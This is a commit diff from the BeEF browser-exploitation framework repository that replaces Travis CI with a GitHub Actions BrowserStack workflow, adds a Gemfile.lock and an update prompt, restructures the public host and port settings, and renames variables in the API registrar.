Travis cleanup (#2224)

Removed old travis-cli files as the project is now using gitHub-actions

.github/ISSUE_TEMPLATE.md

@@ -5,7 +5,7 @@ Verify first that your issue/request has not been posted previously:
 * https://github.com/beefproject/beef/issues
 * https://github.com/beefproject/beef/wiki/FAQ
 
-Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/v0.5.1.0).
+Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/v0.5.3.0).
 
 Please do your best to provide as much information as possible. It will help substantially if you can enable and provide debugging logs with your issue. Instructions for enabling debugging logs are below:
 

.github/workflows/github_actions.yml

@@ -0,0 +1,59 @@
+name: 'BrowserStack Test'
+
+on:
+  pull_request_target:
+    branches: [ master ]
+      
+jobs:
+  approve:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Approve
+      run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
+      
+  ubuntu-job:
+    name: 'BrowserStack Test on Ubuntu'
+    runs-on: ubuntu-latest  # Can be self-hosted runner also
+    environment:
+      name: Integrate Pull Request
+    env: 
+      GITACTIONS: true
+    steps:
+
+      - name: 'BrowserStack Env Setup'  # Invokes the setup-env action
+        uses: browserstack/github-actions/setup-env@master
+        with:
+          username:  ${{ secrets.BROWSERSTACK_USERNAME }}
+          access-key: ${{ secrets.BROWSERSTACK_ACCESS_KEY }}
+
+      - name: 'BrowserStack Local Tunnel Setup'  # Invokes the setup-local action
+        uses: browserstack/github-actions/setup-local@master
+        with:
+          local-testing: start
+          local-identifier: random
+
+      - name: 'Checkout the repository'
+        uses: actions/checkout@v2
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+          fetch-depth: 2
+
+      - name: 'Setting up Ruby'
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 2.7.2 # Not needed with a .ruby-version file
+
+      - name: 'Build and run tests'
+        run: |
+          sudo apt update
+          sudo apt install libcurl4 libcurl4-openssl-dev
+          bundle config unset --local without
+          bundle config set --local with 'test' 'development'
+          bundle install
+          bundle exec rake browserstack --trace
+
+      - name: 'BrowserStackLocal Stop'  # Terminating the BrowserStackLocal tunnel connection
+        uses: browserstack/github-actions/setup-local@master
+        with:
+          local-testing: stop

.gitignore

@@ -9,7 +9,6 @@ custom-config.yaml
 .rvmrc
 beef.log
 
-*.lock
 
 extensions/metasploit/msf-exploits.cache
 

.travis.yml

@@ -1,99 +0,0 @@
-language: ruby
-rvm:
-- 2.5.3
-- 2.6.0
-- 2.6.3
-- 2.6.5
-- 2.7.0
-notifications:
-  email:
-    recipients:
-      - wade@bindshell.net
-  on_success: always
-  on_failure: always
-branches:
-  only:
-  - master
-  - browserstack
-before_script:
-  - RUBY_VERSION=/bin/bash rvm current
-  - sed -i -E 's/system\((.*?)\)/""/g' /home/travis/.rvm/gems/$RUBY_VERSION/gems/browserstack-local-1.3.0/lib/browserstack/local.rb
-env:
-  - CONFIG_FILE=osx/catalina/catalina_chrome_41.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_chrome_59.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_chrome_81.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_firefox_11.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_firefox_68esr.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_firefox_75.config.yml
-  - CONFIG_FILE=osx/catalina/catalina_safari_13.config.yml
-  - CONFIG_FILE=osx/elcapitan/elcapitan_chrome_14.config.yml
-  - CONFIG_FILE=osx/elcapitan/elcapitan_chrome_81.config.yml
-  - CONFIG_FILE=osx/elcapitan/elcapitan_firefox_7.config.yml
-  - CONFIG_FILE=osx/elcapitan/elcapitan_firefox_75.config.yml
-  - CONFIG_FILE=osx/elcapitan/elcapitan_safari_9-1.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_chrome_14.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_chrome_35.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_chrome_49.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_firefox_7.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_firefox_38esr.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_firefox_42.config.yml
-  - CONFIG_FILE=osx/snowleopard/snowleopard_safari_5-1.config.yml
-  - CONFIG_FILE=windows/win10/win10_chrome_37.config.yml
-  - CONFIG_FILE=windows/win10/win10_chrome_59.config.yml
-  - CONFIG_FILE=windows/win10/win10_firefox_32.config.yml
-  - CONFIG_FILE=windows/win10/win10_firefox_68esr.config.yml
-  - CONFIG_FILE=windows/win10/win10_firefox_75.config.yml
-  - CONFIG_FILE=windows/win10/win10_edge_81.config.yml
-  - CONFIG_FILE=windows/win10/win10_ie_11.config.yml
-  - CONFIG_FILE=windows/win8/win8_chrome_22.config.yml
-  - CONFIG_FILE=windows/win8/win8_chrome_81.config.yml
-  - CONFIG_FILE=windows/win8/win8_firefox_32.config.yml
-  - CONFIG_FILE=windows/win8/win8_firefox_75.config.yml
-  - CONFIG_FILE=windows/win8/win8_edge_81.config.yml
-  - CONFIG_FILE=windows/win8/win8_ie_10.config.yml
-  - CONFIG_FILE=windows/xp/xp_chrome_14.config.yml
-  - CONFIG_FILE=windows/xp/xp_chrome_28.config.yml
-  - CONFIG_FILE=windows/xp/xp_chrome_43.config.yml
-  - CONFIG_FILE=windows/xp/xp_firefox_16.config.yml
-  - CONFIG_FILE=windows/xp/xp_firefox_26.config.yml
-  - CONFIG_FILE=windows/xp/xp_firefox_45.config.yml
-  - CONFIG_FILE=windows/xp/xp_ie_7.config.yml
-jobs:
-  include:
-    - name: "Full Test Suite 2.5.3"
-      rvm: 2.5.3
-      env: CONFIG_FILE=windows/win10/win10_chrome_81.config.yml
-      script: bundle exec rspec
-    - name: "Full Test Suite 2.6.0"
-      rvm: 2.6.0
-      env: CONFIG_FILE=windows/win10/win10_chrome_81.config.yml
-      script: bundle exec rspec
-    - name: "Full Test Suite 2.6.3"
-      rvm: 2.6.3
-      env: CONFIG_FILE=windows/win10/win10_chrome_81.config.yml
-      script: bundle exec rspec
-    - name: "Full Test Suite 2.6.5"
-      rvm: 2.6.5
-      env: CONFIG_FILE=windows/win10/win10_chrome_81.config.yml
-      script: bundle exec rspec
-    - name: "Full Test Suite 2.7.0"
-      rvm: 2.7.0
-      env: CONFIG_FILE=windows/win10/win10_chrome_81.config.yml
-      script: bundle exec rspec
-script:
-  - bundle exec rspec --tag run_on_browserstack
-addons:
-  apt:
-    packages:
-    - libsqlite3-dev
-    - build-essential
-    - patch
-    - ruby-dev
-    - zlib1g-dev
-    - liblzma-dev
-    - libcurl4-openssl-dev
-  browserstack:
-    username:
-      secure: "Yj+a2jY56dFqJwXdU6JdSXeKhhS01CiToBoB922SXVnA2D2WclGOFiTi0YrkAS9PuOJX5AjC9eUw7VFUcp8DiLmeDGLWo8klYrWQoJOH55FmSWKjdkqDopJFYr0ZXk/ZuXzzpuMvKkCT5MGFnySXyheTW8aUj33GetJ6/sNq5BoA36jH04OE3iPgdBaFPRNDVXEIWLaLUDQsAyZsHNNYC+/cj3cxjXLHu+mbNuXsXEHgrHJ2A94EWdrdGODWL8mRtlSDNkIaYHZKCBnUlHWwCwBitLsjhzdy0YFrIGVbX96FV+C41sjPWLFjZhjAaNDuJ3FoTplbzFNvrw5oxQAAI8ZZqUwF4MRIrQbN8BLFVISX7JooQjfyrNVWvhpZWGPB4GZTN4CThrlQ7G7CJRYDVyqZ7nen6y0+osBr9DRKN+EemlVG73aNP3mXaZr6BmS1BpQJ6tlqDdLCvC5j/PdguKwvt4EmgHA8Pzn20UElV+8BPblcYGjsWplk/cxW1adW0pu2vIxskKxDKJ/ReY3l5yUpiQPZHbuMidq2ffSX0B3yALe7vx+3AvMb2Fk9yWh52EVJXPkVlLvhP7wDd22MHCemvrC2nLhkVR4MglLWs7dZKHswExlKJdWK4OSXprOStjZSA47sjF2nPdztWTpdI77SKaBcoLGR5WOV+JtcQgk="
-    access_key:
-      secure: "KHlR8NHPnoF9U1CJKgUhS1YhPSeTILI2lIu+JilQ5Xeo7rcbWg9lT2xwQQNnLYrISG1vC6OzsbkcnC/3ZnAv7jYff4iUTc3Syszs5wIhhvnhBx4qCxM+/UD78TJNQ0AuY7NOIK6OXcmwbpZrOBUojZkooEkc8bpG56nb2v7dOIafFLV+tv9xcc5DtMSfh7FavhqRFRO+PCybqOW8yWMc2NiMYy3p9jKBC3qYRqme4hx1NRrLo5BZQ+UIcO3Rf+vAjUP+3gGuhWeu2kDCvZYDnI2GN1/WacRVY2cqDPGiYlD6pHNMqU0raYKyWdK0QD4KwYpfjxBGRmwBfz8xU8KWUEZ3P11mJn+BvIt0qe3VpomR0/60/fok1BEso3nea8oENXur5G/5SOfpkPLjzd4P4f7JYnST1PeeWwpzV305wktDv9aLc+Ne9cFCaxSaaCnOk82rKDhtnktwnK7krFj1lM6oygtOD+arAytPKaURRgV2izaoophiXuLFb+9XKSkMGtJ3e+rQATonnDPaFTzouKaXSEPxZQQ2bnsp9tETAReDrYIwPHuYL778UbbBICgNk54CZSfTeRFLroRGNPb/0gPXbu6SryPnknfCMNd7ksSndVoyKsDo1plTHQJGVweP2hxR3R/9syk9Z6DU6H5H3dc/RbkkmoRPVooUtR/mZ/c="

Gemfile

@@ -20,11 +20,10 @@ gem 'term-ansicolor', :require => 'term/ansicolor'
 gem 'json'
 gem 'rubyzip', '>= 1.2.2'
 gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
-gem 'nokogiri', '>= 1.11.1'
 gem 'rake', '>= 12.3.3'
 gem 'otr-activerecord', '>= 1.4.2'
 gem 'sqlite3'
-gem 'rubocop', '~> 0.92.0', require: false
+gem 'rubocop', '~> 1.22.3', require: false
 
 # Geolocation support
 group :geoip do

Gemfile.lock

@@ -0,0 +1,298 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    activemodel (6.1.4.1)
+      activesupport (= 6.1.4.1)
+    activerecord (6.1.4.1)
+      activemodel (= 6.1.4.1)
+      activesupport (= 6.1.4.1)
+    activesupport (6.1.4.1)
+      concurrent-ruby (~> 1.0, >= 1.0.2)
+      i18n (>= 1.6, < 2)
+      minitest (>= 5.1)
+      tzinfo (~> 2.0)
+      zeitwerk (~> 2.3)
+    addressable (2.8.0)
+      public_suffix (>= 2.0.2, < 5.0)
+    ansi (1.5.0)
+    archive-zip (0.12.0)
+      io-like (~> 0.3.0)
+    ast (2.4.2)
+    async (1.30.1)
+      console (~> 1.10)
+      nio4r (~> 2.3)
+      timers (~> 4.1)
+    async-dns (1.3.0)
+      async-io (~> 1.15)
+    async-io (1.32.2)
+      async
+    browserstack-local (1.3.0)
+    buftok (0.2.0)
+    byebug (11.1.3)
+    capybara (3.36.0)
+      addressable
+      matrix
+      mini_mime (>= 0.1.3)
+      nokogiri (~> 1.8)
+      rack (>= 1.6.0)
+      rack-test (>= 0.6.3)
+      regexp_parser (>= 1.5, < 3.0)
+      xpath (~> 3.2)
+    childprocess (3.0.0)
+    coderay (1.1.3)
+    concurrent-ruby (1.1.9)
+    console (1.13.1)
+      fiber-local
+    curb (0.9.11)
+    daemons (1.4.1)
+    diff-lcs (1.4.4)
+    domain_name (0.5.20190701)
+      unf (>= 0.0.5, < 1.0.0)
+    em-websocket (0.5.2)
+      eventmachine (>= 0.12.9)
+      http_parser.rb (~> 0.6.0)
+    equalizer (0.0.11)
+    erubis (2.7.0)
+    espeak-ruby (1.0.4)
+    event_emitter (0.2.6)
+    eventmachine (1.2.7)
+    execjs (2.8.1)
+    ffi (1.15.4)
+    ffi-compiler (1.0.1)
+      ffi (>= 1.0.0)
+      rake
+    fiber-local (1.0.0)
+    geckodriver-helper (0.24.0)
+      archive-zip (~> 0.7)
+    hashie (4.1.0)
+    hashie-forbidden_attributes (0.1.1)
+      hashie (>= 3.0)
+    http (4.4.1)
+      addressable (~> 2.3)
+      http-cookie (~> 1.0)
+      http-form_data (~> 2.2)
+      http-parser (~> 1.2.0)
+    http-accept (1.7.0)
+    http-cookie (1.0.4)
+      domain_name (~> 0.5)
+    http-form_data (2.3.0)
+    http-parser (1.2.3)
+      ffi-compiler (>= 1.0, < 2.0)
+    http_parser.rb (0.6.0)
+    i18n (1.8.10)
+      concurrent-ruby (~> 1.0)
+    io-console (0.5.9)
+    io-like (0.3.1)
+    irb (1.3.7)
+      reline (>= 0.2.7)
+    json (2.6.1)
+    matrix (0.4.2)
+    maxmind-db (1.1.1)
+    memoizable (0.4.2)
+      thread_safe (~> 0.3, >= 0.3.1)
+    method_source (1.0.0)
+    mime-types (3.3.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2021.0901)
+    mini_mime (1.1.2)
+    mini_portile2 (2.6.1)
+    minitest (5.14.4)
+    mojo_magick (0.6.6)
+    msfrpc-client (1.1.2)
+      msgpack (~> 1)
+    msgpack (1.4.2)
+    multipart-post (2.1.1)
+    mustermann (1.1.1)
+      ruby2_keywords (~> 0.0.1)
+    naught (1.1.0)
+    netrc (0.11.0)
+    nio4r (2.5.8)
+    nokogiri (1.12.5)
+      mini_portile2 (~> 2.6.1)
+      racc (~> 1.4)
+    otr-activerecord (2.0.3)
+      activerecord (>= 4.0, < 7.1)
+      hashie-forbidden_attributes (~> 0.1)
+    parallel (1.21.0)
+    parseconfig (1.1.2)
+    parser (3.0.2.0)
+      ast (~> 2.4.1)
+    power_assert (2.0.1)
+    pry (0.13.1)
+      coderay (~> 1.1)
+      method_source (~> 1.0)
+    pry-byebug (3.9.0)
+      byebug (~> 11.0)
+      pry (~> 0.13.0)
+    public_suffix (4.0.6)
+    qr4r (0.6.1)
+      mojo_magick (~> 0.6.5)
+      rqrcode_core (~> 0.1)
+    racc (1.6.0)
+    rack (2.2.3)
+    rack-protection (2.1.0)
+      rack
+    rack-test (1.1.0)
+      rack (>= 1.0, < 3)
+    rainbow (3.0.0)
+    rake (13.0.6)
+    rdoc (6.3.2)
+    regexp_parser (2.1.1)
+    reline (0.2.7)
+      io-console (~> 0.5)
+    rest-client (2.1.0)
+      http-accept (>= 1.7.0, < 2.0)
+      http-cookie (>= 1.0.2, < 2.0)
+      mime-types (>= 1.16, < 4.0)
+      netrc (~> 0.8)
+    rexml (3.2.5)
+    rqrcode_core (0.2.0)
+    rr (3.0.7)
+    rspec (3.10.0)
+      rspec-core (~> 3.10.0)
+      rspec-expectations (~> 3.10.0)
+      rspec-mocks (~> 3.10.0)
+    rspec-core (3.10.1)
+      rspec-support (~> 3.10.0)
+    rspec-expectations (3.10.1)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.10.0)
+    rspec-mocks (3.10.2)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.10.0)
+    rspec-support (3.10.2)
+    rubocop (1.22.3)
+      parallel (~> 1.10)
+      parser (>= 3.0.0.0)
+      rainbow (>= 2.2.2, < 4.0)
+      regexp_parser (>= 1.8, < 3.0)
+      rexml
+      rubocop-ast (>= 1.12.0, < 2.0)
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 3.0)
+    rubocop-ast (1.12.0)
+      parser (>= 3.0.1.1)
+    ruby-progressbar (1.11.0)
+    ruby2_keywords (0.0.5)
+    rubyzip (2.3.2)
+    rushover (0.3.0)
+      json
+      rest-client
+    selenium-webdriver (3.142.7)
+      childprocess (>= 0.5, < 4.0)
+      rubyzip (>= 1.2.2)
+    simple_oauth (0.3.1)
+    sinatra (2.1.0)
+      mustermann (~> 1.0)
+      rack (~> 2.2)
+      rack-protection (= 2.1.0)
+      tilt (~> 2.0)
+    slack-notifier (2.4.0)
+    sqlite3 (1.4.2)
+    sync (0.5.0)
+    term-ansicolor (1.7.1)
+      tins (~> 1.0)
+    test-unit (3.5.1)
+      power_assert
+    test-unit-context (0.5.1)
+      test-unit (>= 2.4.0)
+    test-unit-full (0.0.5)
+      test-unit
+      test-unit-context
+      test-unit-notify
+      test-unit-rr
+      test-unit-runner-tap
+    test-unit-notify (1.0.4)
+      test-unit (>= 2.4.9)
+    test-unit-rr (1.0.5)
+      rr (>= 1.1.1)
+      test-unit (>= 2.5.2)
+    test-unit-runner-tap (1.1.2)
+      test-unit
+    thin (1.8.1)
+      daemons (~> 1.0, >= 1.0.9)
+      eventmachine (~> 1.0, >= 1.0.4)
+      rack (>= 1, < 3)
+    thread_safe (0.3.6)
+    tilt (2.0.10)
+    timers (4.3.3)
+    tins (1.29.1)
+      sync
+    twitter (7.0.0)
+      addressable (~> 2.3)
+      buftok (~> 0.2.0)
+      equalizer (~> 0.0.11)
+      http (~> 4.0)
+      http-form_data (~> 2.0)
+      http_parser.rb (~> 0.6.0)
+      memoizable (~> 0.4.0)
+      multipart-post (~> 2.0)
+      naught (~> 1.0)
+      simple_oauth (~> 0.3.0)
+    tzinfo (2.0.4)
+      concurrent-ruby (~> 1.0)
+    uglifier (4.2.0)
+      execjs (>= 0.3.0, < 3)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.7.7)
+    unicode-display_width (2.1.0)
+    webrick (1.7.0)
+    websocket (1.2.9)
+    websocket-client-simple (0.3.0)
+      event_emitter
+      websocket
+    xmlrpc (0.3.2)
+      webrick
+    xpath (3.2.0)
+      nokogiri (~> 1.8)
+    zeitwerk (2.5.1)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  ansi
+  async-dns
+  browserstack-local (~> 1.3)
+  capybara
+  curb
+  em-websocket
+  erubis
+  espeak-ruby (>= 1.0.4)
+  eventmachine
+  execjs
+  geckodriver-helper
+  irb
+  json
+  maxmind-db
+  mime-types
+  msfrpc-client
+  otr-activerecord (>= 1.4.2)
+  parseconfig
+  pry-byebug
+  qr4r
+  rack (>= 2.2.3)
+  rack-protection (>= 2.0.0)
+  rake (>= 12.3.3)
+  rdoc
+  rest-client (>= 2.0.1)
+  rspec
+  rubocop (~> 1.22.3)
+  rubyzip (>= 1.2.2)
+  rushover
+  selenium-webdriver
+  sinatra (>= 2.0.2)
+  slack-notifier
+  sqlite3
+  term-ansicolor
+  test-unit
+  test-unit-full
+  thin
+  twitter (>= 5.0.0)
+  uglifier (>= 2.7.2)
+  websocket-client-simple (~> 0.3.0)
+  xmlrpc
+
+BUNDLED WITH
+   2.1.4

INSTALL.txt

@@ -67,5 +67,11 @@ it's best to regularly update BeEF to the latest version.
 
 If you're using BeEF from the GitHub repository, updating is as simple as:
 
+  $ ./update-beef
+
+Or pull the latest repo yourself and then update the gems with:
+  
   $ git pull
   
+  $ bundle
+

Rakefile

@@ -23,6 +23,22 @@ RSpec::Core::RakeTask.new(:spec) do |task|
   task.rspec_opts = ['--tag ~run_on_browserstack']
 end
 
+RSpec::Core::RakeTask.new(:browserstack) do |task|
+  task.rspec_opts = ['--tag run_on_browserstack']
+end
+
+RSpec::Core::RakeTask.new(:bs) do |task|
+  configs = Dir["spec/support/browserstack/**/*.yml"]
+  configs.each do |config|
+    config = config.split('spec/support/browserstack')[1]
+    ENV['CONFIG_FILE'] = config
+    puts "\e[45m#{config.upcase}\e[0m"
+    task.rspec_opts = ['--tag run_on_browserstack']
+    Rake::Task['browserstack'].invoke
+    Rake::Task['browserstack'].reenable
+  end
+end
+
 ################################
 # SSL/TLS certificate
 

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.5.1.0
+0.5.4.0-pre

beef

@@ -42,6 +42,28 @@ $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 # @note Require core loader
 #
 require 'core/loader'
+require 'timeout'
+
+#
+# @note Ask user if they would like to update beef
+#
+if File.exist?("#{$root_dir}git") && BeEF::Core::Console::CommandLine.parse[:update_disabled] == false
+  if BeEF::Core::Console::CommandLine.parse[:update_auto] == true
+    print 'Checking latest BeEF repository and updating'
+    `git pull && bundle`
+  elsif `git rev-parse master` != `git rev-parse origin/master`
+    begin
+      Timeout.timeout(5) do
+        puts '-- BeEF Update Available --'
+        print 'Would you like to update to lastest version? y/n: '
+        response = gets
+        `git pull && bundle` if response.strip == 'y'
+      end
+    rescue Timeout::Error
+      puts "\nUpdate Skipped with input timeout"
+    end
+  end
+end
 
 #
 # @note Create ~/.beef/
@@ -109,13 +131,13 @@ end
 #
 # @note Validate beef.http.public and beef.http.public_port
 #
-unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
-  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
   exit 1
 end
 
-unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
-  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
   exit 1
 end
 

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.5.1.0'
+    version: '0.5.4.0-pre'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)
@@ -47,8 +47,14 @@ beef:
 
         # Host Name / Domain Name
         # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
-        #   set the public hostname below:
-        #public: ""      # public hostname/IP address
+        # These settings will be used to create a public facing URL
+        # This public facing URL will be used for all hook related calls
+        # set the public setting below:
+        # public:
+        #     host: "" # public hostname/IP address
+        #     port: "" # public port will default to 80 if no https 443 if https 
+                      # and local if not set but there is a public host
+        #     https: false # true/false
 
         # Reverse Proxy / NAT
         # If you want BeEF to be accessible behind a reverse proxy or NAT,
@@ -56,8 +62,6 @@ beef:
         # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
         #   by altering the X-FORWARDED-FOR ip address in the request header.
         allow_reverse_proxy: false
-        #public: ""      # public hostname/IP address
-        #public_port: "" # public port (experimental)
 
         # Hook
         hook_file: "/hook.js"
@@ -89,6 +93,8 @@ beef:
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
             # In production environments, be sure to use a valid certificate signed for the value
             # used in beef.http.public (the domain name of the server where you run BeEF)
             key: "beef_key.pem"

core/api.rb

@@ -6,7 +6,6 @@
 
 module BeEF
   module API
-
     #
     # Registrar class to handle all registered timed API calls
     #
@@ -24,18 +23,18 @@ module BeEF
       # Register timed API calls to an owner
       #
       # @param [Class] owner the owner of the API hook
-      # @param [Class] c the API class the owner would like to hook into
+      # @param [Class] clss the API class the owner would like to hook into
       # @param [String] method the method of the class the owner would like to execute
       # @param [Array] params an array of parameters that need to be matched before the owner will be called
       #
-      def register(owner, c, method, params = [])
-        unless verify_api_path(c, method)
-          print_error "API Registrar: Attempted to register non-existant API method #{c} :#{method}"
+      def register(owner, clss, method, params = [])
+        unless verify_api_path(clss, method)
+          print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
           return
         end
 
-        if registered?(owner, c, method, params)
-          print_debug "API Registrar: Attempting to re-register API call #{c} :#{method}"
+        if registered?(owner, clss, method, params)
+          print_debug "API Registrar: Attempting to re-register API call #{clss} :#{method}"
           return
         end
 
@@ -43,7 +42,7 @@ module BeEF
         @registry << {
           'id' => id,
           'owner' => owner,
-          'class'  => c,
+          'class' => clss,
           'method' => method,
           'params' => params
         }
@@ -56,18 +55,19 @@ module BeEF
       # Tests whether the owner is registered for an API hook
       #
       # @param [Class] owner the owner of the API hook
-      # @param [Class] c the API class
+      # @param [Class] clss the API class
       # @param [String] method the method of the class
       # @param [Array] params an array of parameters that need to be matched
       #
       # @return [Boolean] whether or not the owner is registered
       #
-      def registered?(owner, c, method, params = [])
+      def registered?(owner, clss, method, params = [])
         @registry.each do |r|
           next unless r['owner'] == owner
-          next unless r['class'] == c
+          next unless r['class'] == clss
           next unless r['method'] == method
           next unless is_matched_params? r, params
+
           return true
         end
         false
@@ -76,17 +76,18 @@ module BeEF
       #
       # Match a timed API call to determine if an API.fire() is required
       #
-      # @param [Class] c the target API class
+      # @param [Class] clss the target API class
       # @param [String] method the method of the target API class
       # @param [Array] params an array of parameters that need to be matched
       #
       # @return [Boolean] whether or not the arguments match an entry in the API registry
       #
-      def matched?(c, method, params = [])
+      def matched?(clss, method, params = [])
         @registry.each do |r|
-          next unless r['class'] == c
+          next unless r['class'] == clss
           next unless r['method'] == method
           next unless is_matched_params? r, params
+
           return true
         end
         false
@@ -103,18 +104,19 @@ module BeEF
 
       #
       # Retrieves all the owners and ID's of an API hook
-      # @param [Class] c the target API class
+      # @param [Class] clss the target API class
       # @param [String] method the method of the target API class
       # @param [Array] params an array of parameters that need to be matched
       #
       # @return [Array] an array of hashes consisting of two keys :owner and :id
       #
-      def get_owners(c, method, params = [])
+      def get_owners(clss, method, params = [])
         owners = []
         @registry.each do |r|
-          next unless r['class'] == c
+          next unless r['class'] == clss
           next unless r['method'] == method
           next unless is_matched_params? r, params
+
           owners << { :owner => r['owner'], :id => r['id'] }
         end
         owners
@@ -126,23 +128,23 @@ module BeEF
       #
       # @note This is a security precaution
       #
-      # @param [Class] c the target API class to verify
-      # @param [String] m the target method to verify
+      # @param [Class] clss the target API class to verify
+      # @param [String] mthd the target method to verify
       #
-      def verify_api_path(c, m)
-        (c.const_defined?('API_PATHS') && c.const_get('API_PATHS').key?(m))
+      def verify_api_path(clss, mthd)
+        (clss.const_defined?('API_PATHS') && clss.const_get('API_PATHS').key?(mthd))
       end
 
       #
       # Retrieves the registered symbol reference for an API hook
       #
-      # @param [Class] c the target API class to verify
-      # @param [String] m the target method to verify
+      # @param [Class] clss the target API class to verify
+      # @param [String] mthd the target method to verify
       #
       # @return [Symbol] the API path
       #
-      def get_api_path(c, m)
-        verify_api_path(c, m) ? c.const_get('API_PATHS')[m] : nil
+      def get_api_path(clss, mthd)
+        verify_api_path(clss, mthd) ? clss.const_get('API_PATHS')[mthd] : nil
       end
 
       #
@@ -171,24 +173,24 @@ module BeEF
       #
       # Fires all owners registered to this API hook
       #
-      # @param [Class] c the target API class
-      # @param [String] m the target API method
+      # @param [Class] clss the target API class
+      # @param [String] mthd the target API method
       # @param [Array] *args parameters passed for the API call
       #
       # @return [Hash, NilClass] returns either a Hash of :api_id and :data
       #         if the owners return data, otherwise NilClass
       #
-      def fire(c, m, *args)
-        mods = get_owners(c, m, args)
+      def fire(clss, mthd, *args)
+        mods = get_owners(clss, mthd, args)
         return nil unless mods.length.positive?
 
-        unless verify_api_path(c, m) && c.ancestors[0].to_s > 'BeEF::API'
-          print_error "API Path not defined for Class: #{c} method:#{method}"
+        unless verify_api_path(clss, mthd) && clss.ancestors[0].to_s > 'BeEF::API'
+          print_error "API Path not defined for Class: #{clss} method:#{method}"
           return []
         end
 
         data = []
-        method = get_api_path(c, m)
+        method = get_api_path(clss, mthd)
         mods.each do |mod|
           begin
             # Only used for API Development (very verbose)
@@ -214,8 +216,7 @@ require 'core/api/modules'
 require 'core/api/extension'
 require 'core/api/extensions'
 require 'core/api/main/migration'
-require 'core/api/main/network_stack/assethandler.rb'
+require 'core/api/main/network_stack/assethandler'
 require 'core/api/main/server'
 require 'core/api/main/server/hook'
 require 'core/api/main/configuration'
-

core/main/command.rb

@@ -42,7 +42,8 @@ module BeEF
     #       Two instances of this object are created during the execution of command module.
     #
     class Command
-      attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
+      attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname,
+      :config
       attr_accessor :zombie, :command_id, :session_id
 
       include BeEF::Core::CommandUtils
@@ -55,15 +56,15 @@ module BeEF
       # @param [String] key command module key
       #
       def initialize(key)
-        config = BeEF::Core::Configuration.instance
+        @config = BeEF::Core::Configuration.instance
 
         @key = key
         @datastore = {}
-        @friendlyname = config.get("beef.module.#{key}.name")
+        @friendlyname = @config.get("beef.module.#{key}.name")
         @output = ''
-        @path = config.get("beef.module.#{key}.path")
+        @path = @config.get("beef.module.#{key}.path")
         @default_command_url = config.get("beef.module.#{key}.mount")
-        @id = config.get("beef.module.#{key}.db.id")
+        @id = @config.get("beef.module.#{key}.db.id")
         @auto_update_zombie = false
         @results = {}
         @beefjs_components = {}

core/main/configuration.rb

@@ -73,9 +73,122 @@ module BeEF
           return
         end
 
+        return unless validate_public_config_variable?(@config)
+
+        if @config['beef']['http']['public_port']
+          print_error 'Config path beef.http.public_port is deprecated.'
+          print_error 'Please use the new format for public variables found'
+          print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
+          return
+        end
+
         true
       end
 
+      #
+      # Returns the configuration value for the http server host
+      # If nothing is set it should default to 0.0.0.0 (all interfaces)
+      def local_host
+        get('beef.http.host') || '0.0.0.0'
+      end
+
+      #
+      # Returns the configuration value for the http server port
+      # If nothing is set it should default to 3000
+      def local_port
+        get('beef.http.port') || '3000'
+      end
+
+      #
+      # Return the local protocol
+      # if nothing is set default to http
+      def local_proto
+        local_https_enabled ? 'https' : 'http'
+      end
+
+      #
+      # Returns the configuration value for the local https enabled
+      # If nothing is set it should default to false
+      def local_https_enabled
+        get('beef.http.https.enable') || false
+      end
+
+      #
+      # Returns the configuration value for the http server host
+      def public_host
+        get('beef.http.public.host')
+      end
+
+      #
+      # Returns the beef host which is used by external resources
+      # e.g. hooked browsers
+      def beef_host
+        public_host || local_host
+      end
+
+      #
+      # Returns the beef port which is used by external resource
+      # e.g. hooked browsers
+      def beef_port
+        public_port || local_port
+      end
+
